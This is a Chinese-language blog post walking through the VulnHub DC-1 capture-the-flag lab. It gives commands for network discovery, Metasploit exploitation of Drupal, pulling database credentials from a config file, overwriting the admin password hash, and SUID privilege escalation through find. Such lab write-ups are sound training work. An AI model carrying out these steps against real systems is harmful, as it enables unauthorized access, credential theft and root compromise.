freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

DC-1打靶过程记录
2023-01-31 14:38:37
所属地 浙江省

下载方式:

下载链接:https://www.vulnhub.com/entry/dc-1,292/

1675146418_63d8b4b2f20a1a9d8157c.png!small?1675146420604

1、发现主机

netdiscover -r 192.168.244.0/24     
因为我的是虚拟机知道网段,不指定参数,只写netdiscover会扫描全部的内网网段(如果扫描了很多IP,可以通过查看虚拟机的MAC地址判断靶机到底是哪个IP 虚拟机--> 设置 --> 网络适配器--> 高级-->最下面就有MAC地址 )

1675146521_63d8b51967b63594a4299.png!small?1675146523069

2、扫端口

nmap -sS 192.168.244.6

3、收集信息,查找漏洞

发现CMS
或者使用kali里的whatweb工具,命令:whatweb -v 192.168.244.6

1675146560_63d8b540a01f0dce39358.png!small?1675146562285

kali寻找模块
search drupal
use 2       //不知道用哪个一个一个试好了
set rhosts 192.168.244.6
set lhost 192.168.244.66 //最好不要设置127.0.0.1,我测试不成功

1675146586_63d8b55a18890544257ac.png!small?1675146587405

flag1

shell    //进入cmd命令
ls       //查看当前目录,发现flagq.txt
cat flag1.txt

1675146600_63d8b5687c29338d92c45.png!small?1675146602028

提示去看配置文件,Drupal的默认配置文件为 /var/www/sites/default/settings.php

pwd           //查看当前路径
cd sites/default   //进入目标目录
cat setting.txt     //查看配置文件

1675146625_63d8b58108c2248aa9102.png!small?1675146626504

*暴力和字典攻击不是最常见的
*只有获得访问权限的方法(您将需要访问权限)。
*你能用这些证书做什么?
//应该是要进行提权操作

flag2

发现flag2的信息,还有数据库信息

1675146639_63d8b58f4738cf469d955.png!small?1675146640638

尝试登录

python -c 'import pty; pty.spawn("/bin/bash")'   //用python达到一个数据交互的效果
mysql -udbuser -pR0ck3t
show databases;
use drupaldb
show tables;             //发现有users表
select * from users\G;   //竖着展示表里的内容

1675146663_63d8b5a731404e6f1c717.png!small?1675146664502

admin的密码:
$S$DYyHOGvUlVey/TRbXOU7.Gsp2wKX.9Q9Jt/SFd085Xhq.cAR.S0u
应该是加密了的HASH,不好解密,去找有关哈希hash的文件

find . -name "*hash*"   //查找含有hash字段的文件

1675146674_63d8b5b210aa40e88aa86.png!small?16751466752571675146686_63d8b5be42294ef166919.png!small?1675146687531


意思应该是直接再后面加密码就会返回加密后的结果,比如
./scripts/password-hash.sh 123456

1675146699_63d8b5cbdd7b8854ec9f3.png!small?1675146701351

那就直接更改一下管理员的密码

update users set pass='$S$DrNd8XhjOJxn3b3s9uR59MUTwgHRlw8cAi07ERzOuP24cYBNtn6N' where name='admin';

flag3

登陆成功,查找flag3.txt的信息

1675146834_63d8b65206ceafcab1fb7.png!small?16751468356961675146840_63d8b658945388b62ae1d.png!small?1675146842061


flag3提示我们需要特殊的find权限去执行操作
根据passwd想到/etc/passwd

1675146855_63d8b667e1c91719f42d8.png!small?16751468574081675146862_63d8b66ea89388272d387.png!small?1675146863960


需要提权

提权

使用命令查看 suid 权限的可执行二进制程序

find / -perm -u=s -type f 2>/dev/null

find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件
2>/dev/nul 过滤错误信息(不显示错误信息)

1675146876_63d8b67cde6a0172cb3b5.png!small?1675146878919

finalflag

使用find命令进行提权

find ./ aaa -exec '/bin/sh' \;

whoami //测试当前权限
cd /root
ls
cat thefinalflag.txt

1675146886_63d8b686c89766cb2fc3b.png!small?1675146888135

结束!!!

总结

1、使用netdiscover发现主机
2、使用nmap扫描端口
3、查找特征
4、利用msfconsole里的exp,对CMS进行渗透
5、寻找flag,根据提示找到配置文件
6、有flag信息,同时获取了数据库账号和密码
7、从数据库入手,解密不了就对admin的的密码进行重置
8、登录,查找flag信息
9、根据提示里有passed字段找到/etc/passwd,发现了flag
10、提示要提权,试试SUID提权,发现有find命令
11、利用find提权成功进入root拿到最后一个flag


# web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录